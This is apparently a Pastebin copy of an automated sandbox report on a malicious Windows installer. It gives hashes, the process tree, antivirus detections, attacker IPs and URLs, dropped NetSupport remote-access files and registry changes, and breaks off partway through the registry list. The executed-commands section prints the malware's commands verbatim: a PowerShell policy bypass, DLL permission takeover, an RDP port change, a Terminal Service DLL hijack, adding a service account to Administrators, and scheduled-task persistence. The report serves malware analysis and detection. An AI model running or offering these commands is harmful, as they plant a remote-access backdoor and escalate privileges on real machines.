API tools faq
paste
paladin316

Exes_d2a062ca772fa3ace7c7edadbd95eaf7_exe_2019-07-16_07_30.txt

paladin316
Jul 16th, 2019
1,680
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.12 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe"
  7. * File Size: 3038197
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
  9. * SHA256: "286c980e3caf90286482d6af0de30e4865599f5d8241957344f92b97b6fb88d6"
  10. * MD5: "d2a062ca772fa3ace7c7edadbd95eaf7"
  11. * SHA1: "dc13b73487e153711a3955a2ce6678881b3ffc7c"
  12. * SHA512: "73cd04708c5db5b96622370f756dbed08a0a9dadee739e389d4a9c7fe0f8b146afd4201f738913126e5a220345ac5842f59bcba6e7a9e320d22975701b63016c"
  13. * CRC32: "41ECBD26"
  14. * SSDEEP: "49152:94GyKQCCrxxMN7QyaZD6caRSDDqjdeLqybDTefAJR2hcSDrd6V83JY:9zICIMN7QycaRSDDqoLbDwrhcOQi5Y"
  15.  
  16. * Process Execution:
  17. "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
  18. "cmd.exe",
  19. "powershell.exe",
  20. "takeown.exe",
  21. "icacls.exe",
  22. "icacls.exe",
  23. "icacls.exe",
  24. "icacls.exe",
  25. "icacls.exe",
  26. "icacls.exe",
  27. "icacls.exe",
  28. "reg.exe",
  29. "reg.exe",
  30. "net.exe",
  31. "net1.exe",
  32. "cmd.exe",
  33. "cmd.exe",
  34. "services.exe",
  35. "svchost.exe",
  36. "WmiPrvSE.exe",
  37. "WmiPrvSE.exe",
  38. "svchost.exe",
  39. "cmd.exe",
  40. "rundll32.exe",
  41. "svchost.exe",
  42. "taskhost.exe",
  43. "svchost.exe",
  44. "taskhost.exe",
  45. "svchost.exe",
  46. "WerFault.exe",
  47. "wermgr.exe",
  48. "rundll32.exe",
  49. "cmd.exe",
  50. "rundll32.exe",
  51. "cmd.exe",
  52. "updsvc.exe",
  53. "cmd.exe",
  54. "schtasks.exe",
  55. "svchost.exe",
  56. "taskeng.exe",
  57. "WerFault.exe",
  58. "lsm.exe"
  59.  
  60.  
  61. * Executed Commands:
  62. "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  63. "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  64. "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
  65. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
  66. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
  67. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
  68. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
  69. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
  70. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
  71. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
  72. "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
  73. "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\hlp11.dat /f",
  74. "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  75. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
  76. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
  77. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  78. "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  79. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  80. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  81. "taskhost.exe $(Arg0)",
  82. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  83. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  84. "cmd.exe /c rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  85. "C:\\Windows\\system32\\WerFault.exe -u -p 2632 -s 288",
  86. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\"",
  87. "rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  88. "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  89. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  90. "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
  91. "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  92. "c:\\windows\\temp\\updsvc.exe",
  93. "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  94. "\"c:\\windows\\temp\\GetUserLang.exe\"",
  95. "taskeng.exe 1C9308F0-8A41-4006-B814-D2F5B13BEDB5 S-1-5-18:NT AUTHORITY\\System:Service:",
  96. "taskeng.exe 8D661787-E909-433D-BDE3-477DCB39306A S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  97. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  98.  
  99.  
  100. * Signatures Detected:
  101.  
  102. "Description": "At least one process apparently crashed during execution",
  103. "Details":
  104.  
  105.  
  106. "Description": "Creates RWX memory",
  107. "Details":
  108.  
  109.  
  110. "Description": "Possible date expiration check, exits too soon after checking local time",
  111. "Details":
  112.  
  113. "process": "cmd.exe, PID 980"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Attempts to connect to a dead IP:Port (5 unique times)",
  119. "Details":
  120.  
  121. "IP": "185.225.17.169:443"
  122.  
  123.  
  124. "IP": "8.250.93.254:80"
  125.  
  126.  
  127. "IP": "185.225.17.169:80"
  128.  
  129.  
  130. "IP": "185.225.17.66:443"
  131.  
  132.  
  133. "IP": "192.35.177.64:80"
  134.  
  135.  
  136.  
  137.  
  138. "Description": "Loads a driver",
  139. "Details":
  140.  
  141. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  142.  
  143.  
  144.  
  145.  
  146. "Description": "Expresses interest in specific running processes",
  147. "Details":
  148.  
  149. "process": "rundll32.exe"
  150.  
  151.  
  152. "process": "winlogon.exe"
  153.  
  154.  
  155. "process": "explorer.exe"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Reads data out of its own binary image",
  161. "Details":
  162.  
  163. "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00000000, length: 0x002e5bf1"
  164.  
  165.  
  166. "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00008c1c, length: 0x002dcfd9"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "A process created a hidden window",
  172. "Details":
  173.  
  174. "Process": "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe -> \"C:\\Windows\\system32\\cmd.exe\""
  175.  
  176.  
  177. "Process": "rundll32.exe -> cmd.exe"
  178.  
  179.  
  180. "Process": "rundll32.exe -> cmd.exe"
  181.  
  182.  
  183.  
  184.  
  185. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  186. "Details":
  187.  
  188. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  189.  
  190.  
  191. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  192.  
  193.  
  194. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  195.  
  196.  
  197. "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  198.  
  199.  
  200. "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
  201.  
  202.  
  203.  
  204.  
  205. "Description": "Performs some HTTP requests",
  206. "Details":
  207.  
  208. "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  209.  
  210.  
  211. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  212.  
  213.  
  214. "url": "http://letitbe.icu/2.txt"
  215.  
  216.  
  217. "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  218.  
  219.  
  220. "url": "http://geo.netsupportsoftware.com/location/loca.asp"
  221.  
  222.  
  223.  
  224.  
  225. "Description": "Deletes its original binary from disk",
  226. "Details":
  227.  
  228.  
  229. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  230. "Details":
  231.  
  232. "Process": "svchost.exe (1760)"
  233.  
  234.  
  235.  
  236.  
  237. "Description": "Attempts to stop active services",
  238. "Details":
  239.  
  240. "servicename": "UmRdpService"
  241.  
  242.  
  243.  
  244.  
  245. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  246. "Details":
  247.  
  248. "Process": "lsm.exe tried to sleep 435 seconds, actually delayed analysis time by 0 seconds"
  249.  
  250.  
  251. "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  252.  
  253.  
  254. "Process": "updsvc.exe tried to sleep 356 seconds, actually delayed analysis time by 0 seconds"
  255.  
  256.  
  257. "Process": "WmiPrvSE.exe tried to sleep 900 seconds, actually delayed analysis time by 0 seconds"
  258.  
  259.  
  260. "Process": "svchost.exe tried to sleep 4985 seconds, actually delayed analysis time by 0 seconds"
  261.  
  262.  
  263.  
  264.  
  265. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  266. "Details":
  267.  
  268. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10986021 times"
  269.  
  270.  
  271.  
  272.  
  273. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  274. "Details":
  275.  
  276. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  277.  
  278.  
  279.  
  280.  
  281. "Description": "Installs itself for autorun at Windows startup",
  282. "Details":
  283.  
  284. "service name": "RunAsSystem1224"
  285.  
  286.  
  287. "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  288.  
  289.  
  290. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath"
  291.  
  292.  
  293. "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  294.  
  295.  
  296. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
  297.  
  298.  
  299. "data": "%SystemRoot%\\help\\hlp11.dat"
  300.  
  301.  
  302. "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  303.  
  304.  
  305.  
  306.  
  307. "Description": "Creates a hidden or system file",
  308. "Details":
  309.  
  310. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP"
  311.  
  312.  
  313. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
  314.  
  315.  
  316. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
  317.  
  318.  
  319. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
  320.  
  321.  
  322. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
  323.  
  324.  
  325. "file": "C:\\Windows\\Temp\\client32.exe"
  326.  
  327.  
  328. "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
  329.  
  330.  
  331. "file": "C:\\Windows\\Temp\\msvcr100.dll"
  332.  
  333.  
  334. "file": "C:\\Windows\\Temp\\nskbfltr.inf"
  335.  
  336.  
  337. "file": "C:\\Windows\\Temp\\NSM.ini"
  338.  
  339.  
  340. "file": "C:\\Windows\\Temp\\NSM.LIC"
  341.  
  342.  
  343. "file": "C:\\Windows\\Temp\\pcicapi.dll"
  344.  
  345.  
  346. "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
  347.  
  348.  
  349. "file": "C:\\Windows\\Temp\\PCICL32.DLL"
  350.  
  351.  
  352. "file": "C:\\Windows\\Temp\\remcmdstub.exe"
  353.  
  354.  
  355. "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
  356.  
  357.  
  358.  
  359.  
  360. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  361. "Details":
  362.  
  363. "Bkav": "HW32.Packed."
  364.  
  365.  
  366. "FireEye": "Generic.mg.d2a062ca772fa3ac"
  367.  
  368.  
  369. "Qihoo-360": "HEUR/QVM20.1.8D73.Malware.Gen"
  370.  
  371.  
  372. "McAfee": "Artemis!D2A062CA772F"
  373.  
  374.  
  375. "Cylance": "Unsafe"
  376.  
  377.  
  378. "Alibaba": "Trojan:Win32/Scrami.8a399acb"
  379.  
  380.  
  381. "Symantec": "ML.Attribute.HighConfidence"
  382.  
  383.  
  384. "APEX": "Malicious"
  385.  
  386.  
  387. "Paloalto": "generic.ml"
  388.  
  389.  
  390. "Kaspersky": "HEUR:Trojan.Win32.Scrami.gen"
  391.  
  392.  
  393. "Avast": "Win32:Malware-gen"
  394.  
  395.  
  396. "DrWeb": "Trojan.MulDrop9.28262"
  397.  
  398.  
  399. "Invincea": "heuristic"
  400.  
  401.  
  402. "McAfee-GW-Edition": "BehavesLike.Win32.PUPXCI.vc"
  403.  
  404.  
  405. "Trapmine": "malicious.moderate.ml.score"
  406.  
  407.  
  408. "SentinelOne": "DFI - Malicious PE"
  409.  
  410.  
  411. "Microsoft": "Trojan:Win32/Zpevdo.A"
  412.  
  413.  
  414. "Endgame": "malicious (high confidence)"
  415.  
  416.  
  417. "AegisLab": "Trojan.Win32.Scrami.4!c"
  418.  
  419.  
  420. "ZoneAlarm": "HEUR:Trojan.Win32.Scrami.gen"
  421.  
  422.  
  423. "Acronis": "suspicious"
  424.  
  425.  
  426. "AVG": "Win32:Malware-gen"
  427.  
  428.  
  429. "Cybereason": "malicious.487e15"
  430.  
  431.  
  432. "CrowdStrike": "win/malicious_confidence_100% (D)"
  433.  
  434.  
  435.  
  436.  
  437. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  438. "Details":
  439.  
  440.  
  441. "Description": "Attempts to create or modify system certificates",
  442. "Details":
  443.  
  444.  
  445. "Description": "Created network traffic indicative of malicious activity",
  446. "Details":
  447.  
  448. "signature": "ET DNS Query to a *.pw domain - Likely Hostile"
  449.  
  450.  
  451.  
  452.  
  453.  
  454. * Started Service:
  455. "TermService",
  456. "WerSvc",
  457. "UmRdpService",
  458. "RunAsSystem1224"
  459.  
  460.  
  461. * Mutexes:
  462. "Global\\CLR_CASOFF_MUTEX",
  463. "TSLicensingLock",
  464. "CicLoadWinStaWinSta0",
  465. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  466. "Local\\WERReportingForProcess2632",
  467. "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  468. "Global\\\\xed\\x95\\xb0\\xc7\\x8f",
  469. "WERUI_BEX64-d9cea5d53964d256a96f47a4e221d2152335d"
  470.  
  471.  
  472. * Modified Files:
  473. "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  474. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  475. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
  476. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  477. "\\??\\PIPE\\srvsvc",
  478. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\170M8EJSQ3YRP9VT3GBJ.temp",
  479. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
  480. "C:\\Windows\\Help\\hlp11.dat",
  481. "C:\\Windows\\Help\\hlp12.dat",
  482. "C:\\Windows\\Help\\hlp13.dat",
  483. "C:\\Windows\\sysnative\\rfxvmt.dll",
  484. "C:\\Windows\\Temp\\desk.txt",
  485. "C:\\Windows\\inf\\setupapi.dev.log",
  486. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  487. "\\??\\PIPE\\samr",
  488. "\\??\\PIPE\\lsarpc",
  489. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  490. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  491. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7c74d58e-3ad2-4500-acb9-a97c9d5ed2aa",
  492. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\mod.txt",
  493. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\dawerwer3434asdf3.dat",
  494. "C:\\Windows\\Help\\35279.ps1",
  495. "\\Device\\Termdd",
  496. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
  497. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  498. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  499. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
  500. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
  501. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
  502. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
  503. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
  504. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
  505. "C:\\Windows\\Temp\\client32.exe",
  506. "C:\\Windows\\Temp\\client32.ini",
  507. "C:\\Windows\\Temp\\HTCTL32.DLL",
  508. "C:\\Windows\\Temp\\msvcr100.dll",
  509. "C:\\Windows\\Temp\\nskbfltr.inf",
  510. "C:\\Windows\\Temp\\NSM.ini",
  511. "C:\\Windows\\Temp\\NSM.LIC",
  512. "C:\\Windows\\Temp\\pcicapi.dll",
  513. "C:\\Windows\\Temp\\PCICHEK.DLL",
  514. "C:\\Windows\\Temp\\PCICL32.DLL",
  515. "C:\\Windows\\Temp\\remcmdstub.exe",
  516. "C:\\Windows\\Temp\\TCCTL32.DLL",
  517. "C:\\Windows\\Temp\\cksini.exe",
  518. "C:\\Windows\\Temp\\updsvc.exe",
  519. "\\Device\\RdpDr",
  520. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  521. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
  522. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
  523. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
  524. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
  525. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERA4CE.tmp.appcompat.txt",
  526. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA1E.tmp.WERInternalMetadata.xml",
  527. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA7D.tmp.hdmp",
  528. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERB943.tmp.mdmp",
  529. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer",
  530. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
  531. "C:\\Windows\\Temp\\mod.txt",
  532. "C:\\Users\\user\\AppData\\Local\\Temp\\mod.txt",
  533. "C:\\Windows\\sysnative\\Tasks\\updsvc",
  534. "\\Device\\LanmanDatagramReceiver",
  535. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  536. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  537. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf"
  538.  
  539.  
  540. * Deleted Files:
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\nsgA7A6.tmp",
  542. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp",
  543. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\",
  545. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
  546. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  547. "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
  548. "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  549. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
  550. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1572.23127796",
  551. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1572.23127796",
  552. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1572.23127796",
  553. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
  554. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
  555. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
  556. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
  557. "C:\\Windows\\Temp\\client32.exe",
  558. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp",
  559. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
  560. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp",
  561. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
  562. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp",
  563. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
  564. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp",
  565. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
  566. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
  567. "C:\\Windows\\Tasks\\updsvc.job",
  568. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  569.  
  570.  
  571. * Modified Registry Keys:
  572. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  573. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  574. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  575. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  576. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  577. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  578. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  579. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  580. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  581. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  582. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  583. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  584. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
  585. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
  586. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  587. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  588. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224",
  589. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Type",
  590. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Start",
  591. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ErrorControl",
  592. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath",
  593. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DisplayName",
  594. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ObjectName",
  595. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DeleteFlag",
  596. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  597. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
  598. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
  599. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
